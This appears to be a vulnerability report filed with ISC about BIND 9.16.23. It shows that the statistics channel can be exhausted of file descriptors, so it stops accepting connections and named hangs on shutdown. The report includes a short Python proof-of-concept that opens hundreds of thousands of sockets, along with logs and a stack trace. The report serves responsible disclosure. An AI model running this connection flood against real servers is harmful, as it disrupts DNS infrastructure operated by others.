Potential method to DoS the statistics channel and prevent BIND from exiting on 9.16

As reported to us in Support Ticket #21309

The submitter writes:

This ticket is being reported against BIND 9.16.23; these issues were found during code review after the (September) CVE announcement.

The implementation in lib/isc/httpd.c appears to be implementing the "Connection" header from HTTP/1.0 form of persistent connections. In HTTP/1.1, persistent connections are the default. But this seems to have an effect in the lib/isc/httpd.c code only when a HTTP request has been received on the connection and the appropriate flags have been set.

isc_httpdmgr_create() accepts a timermgr argument, but appears to do nothing with it except save it into a context. There are no timeouts. So a client can open a connection and keep it open perpetually (I've checked that this can happen). There is no quota. So if this socket is open to the public internet, a question is whether this be exploited to cause, e.g., fd exhaustion or even OOM condition. (SO_KEEPALIVE is not set either.)

It appears that named limits the number of open accepted connections for the statistics-channel socket.

ISC BIND 9.16.23-S1's named is run with the following config:

options {
        listen-on port 5300 { 127.0.0.1; };
        // ...
};

statistics-channels {
         inet * port 5302 allow { localhost; };
};

named logged the following message on startup:

21-Sep-2022 21:05:43.287 using up to 21000 sockets

A simple Python client program was run after setting the fd soft-limit of the client program environment:

$ ulimit -H -n
524288
$ ulimit -S -n 512000
$ ulimit -S -n
512000
$ cat statsconnect.py
import socket
import time

sockets = []
for i in range(0, 480000):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('127.0.0.1', 5302))
    sockets.append(s)

time.sleep(3600)
$ python statsconnect.py
^CTraceback (most recent call last):
  File "/home/myself/statsconnect.py", line 7, in <module>
    s.connect(('127.0.0.1', 5302))
KeyboardInterrupt

$

(It was interrupted by SIGINT keyboard break.)

named logged the following message upon running statsconnect.py:

21-Sep-2022 21:13:46.799 accept: file descriptor exceeds limit (21000/21000)

After that, named still responds to DNS queries:

$ dig +tcp +short @127.0.0.1 -p 5300 . soa
a.root-servers.net. nstld.verisign-grs.com. 2022091300 1800 900 604800 86400
$

But it does not accept any more connections on the statistics-channels socket (indefinitely, even after the statsconnect.py process has exited and over 60 seconds have passed which should also factor in any wait period if the kernel automatically collects the client's fds):

$ telnet 127.0.0.1 5302
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection timed out
$

So at least DoS of the statistics-channel appears possible.

And named does not terminate when attempting to stop it:

21-Sep-2022 21:13:46.799 accept: file descriptor exceeds limit (21000/21000)
21-Sep-2022 21:29:23.296 no longer listening on 127.0.0.1#5300
21-Sep-2022 21:29:23.298 shutting down
21-Sep-2022 21:29:23.298 stopping statistics channel on 0.0.0.0#5302

and blocks there indefinitely.

pstack dumps this:

Thread 2 (Thread 0x7fd3f1893640 (LWP 431172) "isc-net-0000"):
#0  0x00007fd3f1e627b0 in __lll_lock_wait () from /lib64/libpthread.so.0
#1  0x00007fd3f1e5b6b2 in pthread_mutex_lock () from /lib64/libpthread.so.0
#2  0x00007fd3f245ee6f in isc_socket_cancel (sock=0x7fd3df675178, task=0x7fd3df670190, how=how@entry=15) at socket.c:4975
#3  0x00007fd3f2423f57 in isc_httpdmgr_shutdown (httpdmgrp=<optimized out>) at httpd.c:1094
#4  0x000000000044ee8c in shutdown_listener (listener=0x7fd3cdf41010) at statschannel.c:3773
#5  named_statschannels_shutdown (server=server@entry=0x7fd3df65f010) at statschannel.c:4156
#6  0x000000000043c505 in shutdown_server (task=<optimized out>, event=<optimized out>) at ./server.c:10144
#7  0x00007fd3f244c355 in task_run (task=0x7fd3df66a010) at task.c:857
#8  isc_task_run (task=0x7fd3df66a010) at task.c:950
#9  0x00007fd3f2436e49 in isc__nm_async_task (worker=0xc93790, ev0=0x7fd3df673970) at netmgr.c:879
#10 process_netievent (worker=worker@entry=0xc93790, ievent=0x7fd3df673970) at netmgr.c:958
#11 0x00007fd3f2436fc5 in process_queue (worker=worker@entry=0xc93790, type=type@entry=NETIEVENT_TASK) at netmgr.c:1027
#12 0x00007fd3f2437773 in process_all_queues (worker=0xc93790) at netmgr.c:798
#13 async_cb (handle=0xc93af0) at netmgr.c:827
#14 0x00007fd3f220fc0d in uv.async_io.part () from /lib64/libuv.so.1
#15 0x00007fd3f222ba84 in uv.io_poll.part () from /lib64/libuv.so.1
#16 0x00007fd3f2215630 in uv_run () from /lib64/libuv.so.1
#17 0x00007fd3f2437077 in nm_thread (worker0=0xc93790) at netmgr.c:733
#18 0x00007fd3f244e6d6 in isc__trampoline_run (arg=0xc7fc40) at trampoline.c:196
#19 0x00007fd3f1e592a5 in start_thread () from /lib64/libpthread.so.0
#20 0x00007fd3f1d81323 in clone () from /lib64/libc.so.6
Thread 1 (Thread 0x7fd3f1a17480 (LWP 431171) "named"):
#0  0x00007fd3f1d48ac5 in clock_nanosleep@GLIBC_2.2.5 () from /lib64/libc.so.6
#1  0x00007fd3f1d4dce7 in nanosleep () from /lib64/libc.so.6
#2  0x00007fd3f1d79669 in usleep () from /lib64/libc.so.6
#3  0x00007fd3f244cd2a in isc__taskmgr_destroy (managerp=0x47ba28 <named_g_taskmgr>) at task.c:1107
#4  0x00007fd3f242b381 in isc_managers_destroy (netmgrp=0x47ba08 <named_g_nm>, taskmgrp=0x47ba28 <named_g_taskmgr>) at managers.c:90
#5  0x000000000041772d in destroy_managers () at ./main.c:967
#6  cleanup () at ./main.c:1341
#7  main (argc=<optimized out>, argv=<optimized out>) at ./main.c:1613

There are 98 other threads [it is a 32 processors machine].

As the named resolver's upstream communications still use the socketmgr, could it also be impacted by this, as that 21000 is a socketmgr limit of fds?